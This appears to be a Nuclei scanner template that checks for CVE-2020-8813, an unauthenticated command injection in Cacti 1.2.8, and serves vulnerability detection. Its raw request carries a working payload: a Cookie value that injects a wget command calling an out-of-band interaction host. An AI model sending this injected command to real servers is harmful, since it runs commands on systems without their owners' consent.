29 lines
965 B
YAML
29 lines
965 B
YAML
id: CVE-2020-8813
|
|
|
|
info:
|
|
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
|
|
author: gy741
|
|
severity: high
|
|
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
|
|
reference:
|
|
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
|
tags: cve,cve2020,cacti,rce,oast
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.80
|
|
cve-id: CVE-2020-8813
|
|
cwe-id: CWE-78
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /graph_realtime.php?action=init HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|